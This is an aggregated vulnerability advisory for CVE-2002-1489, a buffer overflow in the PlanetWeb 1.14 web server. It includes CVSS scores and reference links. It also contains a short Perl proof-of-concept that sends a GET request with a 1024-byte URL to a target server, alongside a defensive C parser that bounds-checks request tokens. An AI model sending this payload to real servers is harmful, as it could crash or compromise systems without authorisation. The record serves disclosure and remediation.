CVE-2002-1489
CVSS 7.5
Published: 2003-04-02 00:00:00
Modified: 2008-09-05 16:30:44

[Original] Buffer overflow in PlanetDNS PlanetWeb 1.14 and earlier allows remote attackers to execute arbitrary code via (1) an HTTP GET request with a long URL or (2) a request with a long method name.


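[CNNVD] PlanetWeb Long GET Request Buffer Overflow Vulnerability (CNNVD-200304-024)

        A buffer overflow vulnerability exists in PlanetDNS PlanetWeb 1.14 and earlier. Remote attackers can execute arbitrary code via (1) an HTTP GET request with an overly long URL or (2) a request with an overly long method name.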

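- CVSS (Base Score)

CVSS score: 7.5 [Severe (HIGH)]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [may degrade performance or interrupt access to resources]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]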

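- CPE (Affected Platforms and Products)

Product and version information (CPE) is not currently available

- OVAL (Technical Details for Detection)

No related OVAL definitions found

- Official Database Links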

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1489
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-1489
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200304-024
(Official data source) CNNVD

- Other Links and Resources

http://www.iss.net/security_center/static/10124.php
(VENDOR_ADVISORY)  XF  planetweb-long-url-bo(10124)
http://www.securityfocus.com/bid/5710
(VENDOR_ADVISORY)  BID  5710
http://www.iss.net/security_center/static/10391.php
(VENDOR_ADVISORY)  XF  planetweb-long-url-bo(10391)
http://archives.neohapsis.com/archives/bugtraq/2002-10/0236.html
(VENDOR_ADVISORY)  BUGTRAQ  20021017 New buffer overflow in plaetDNS
http://archives.neohapsis.com/archives/bugtraq/2002-09/0166.html
(UNKNOWN)  BUGTRAQ  20020914 Planet Web Software Buffer Overflow

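- Vulnerability Information

PlanetWeb Long GET Request Buffer Overflow Vulnerability
High risk  Buffer overflow
2003-04-02 00:00:00 2005-10-20 00:00:00
Remote
        A buffer overflow vulnerability exists in PlanetDNS PlanetWeb 1.14 and earlier. Remote attackers can execute arbitrary code via (1) an HTTP GET request with an overly long URL or (2) a request with an overly long method name.

- Advisories and Patches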

        Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com .

- Vulnerability Information (21795)

PlanetWeb 1.14 Long GET Request Buffer Overflow Vulnerability (EDBID:21795)
windows dos
2002-09-16 Verified
0 UkR-XblP
N/A [Click to download]
source: http://www.securityfocus.com/bid/5710/info

PlanetWeb is a commercially available web server distributed by PlanetDNS. It is available for the Microsoft Windows platform.

PlanetWeb is vulnerable to a buffer overflow condition when handling GET requests of excessive length. Upon receiving a GET request containing a 1024 byte or greater URL, an exploitable buffer overflow occurs. 

This may result in the remote execution of arbitrary code within the context of the web server process.

#!/usr/bin/perl
# PlanetWeb Software perl exploit
# by UkR-XblP / UkR security team
use IO::Socket;
unless (@ARGV == 1) { die "usage: $0 vulnerable_server ..." }
$host = shift(@ARGV);
$remote = IO::Socket::INET->new( Proto     => "tcp",
                                  PeerAddr  => $host,
                                  PeerPort  => "http(80)",
                                  );
unless ($remote) { die "cannot connect to http daemon on $host" }
$xblp = "A" x 1024;
$exploit = "GET /".$xblp." HTTP/1.0\n\n";
$remote->autoflush(1);
print $remote $exploit;
close $remote;		

- Vulnerability Information

10468
PlanetDNS PlanetWeb URL Overflow
Input Manipulation
Loss of Integrity

- Vulnerability Description

Unknown or Incomplete

- Timeline

2002-09-14 Unknown
Unknown Unknown

- Solution

Unknown or Incomplete

- Related References

- Vulnerability Author

Unknown or Incomplete

- Vulnerability Information

PlanetWeb Long GET Request Buffer Overflow Vulnerability
Boundary Condition Error 5710
Yes No
2002-09-16 12:00:00 2009-07-11 05:06:00
Discovery credited to UkR-XbIP of UkR Security Team.

- Affected Program Versions

PlanetDNS PlanetWeb 1.14

- Discussion

PlanetWeb is a commercially available web server distributed by PlanetDNS. It is available for the Microsoft Windows platform.

PlanetWeb is vulnerable to a buffer overflow condition when handling GET requests of excessive length. Upon receiving a GET request containing a 1024 byte or greater URL, an exploitable buffer overflow occurs.

This may result in the remote execution of arbitrary code within the context of the web server process.
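
Added example (not code from the advisory, the vendor, or the PoC author): a request-line parser in C that measures the method and URL tokens before copying them into fixed-size buffers, which is the check missing in both overflow vectors named in the CVE description. The names `take_token`, `parse_request_line` and `probe`, the size limits and the status-code mapping are assumptions made for this example.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>
#define MAX_METHOD 16    /* assumed limits for this example */
#define MAX_TARGET 1023
enum { REQ_OK = 0, REQ_BAD = 400, REQ_URI_TOO_LONG = 414, REQ_BAD_METHOD = 501 };
struct request { char method[MAX_METHOD + 1]; char target[MAX_TARGET + 1]; };

/* Measure the token, copy only if it fits. Returns 0 ok, -1 empty, -2 too long. */
static int take_token(const char *line, size_t len, size_t *pos, char *dst, size_t max)
{
    size_t n = 0;
    while (*pos + n < len && line[*pos + n] != ' ' &&
           line[*pos + n] != '\r' && line[*pos + n] != '\n')
        n++;
    if (n == 0) return -1;
    if (n > max) return -2;          /* reject before any byte is copied */
    memcpy(dst, line + *pos, n);
    dst[n] = '\0';
    *pos += n;
    return 0;
}

/* Parse "METHOD SP TARGET ..." from a length-delimited buffer. */
int parse_request_line(const char *line, size_t len, struct request *out)
{
    size_t pos = 0;
    int rc = take_token(line, len, &pos, out->method, MAX_METHOD);
    if (rc == -2) return REQ_BAD_METHOD;      /* over-long method name */
    if (rc != 0 || pos >= len || line[pos] != ' ') return REQ_BAD;
    pos++;
    rc = take_token(line, len, &pos, out->target, MAX_TARGET);
    if (rc == -2) return REQ_URI_TOO_LONG;    /* over-long URL */
    return rc == 0 ? REQ_OK : REQ_BAD;
}

/* Constructed input: m-byte method, t-byte target, then " HTTP/1.0\r\n". */
int probe(size_t m, size_t t)
{
    static char line[8192];
    struct request req;
    if (t == 0 || m + t + 12 > sizeof line) return -1;
    memset(line, 'M', m);
    line[m] = ' '; line[m + 1] = '/';
    memset(line + m + 2, 'A', t - 1);
    memcpy(line + m + 1 + t, " HTTP/1.0\r\n", 11);
    return parse_request_line(line, m + 1 + t + 11, &req);
}
int main(void) { printf("%d %d %d\n", probe(3, 11), probe(3, 1024), probe(2000, 11)); return 0; }
```

A server built this way answers the over-long request with an error status instead of writing past the end of the buffer.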

- Exploit

The following proof of concept code has been supplied by UkR-XblP:

- Solution

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- Related References
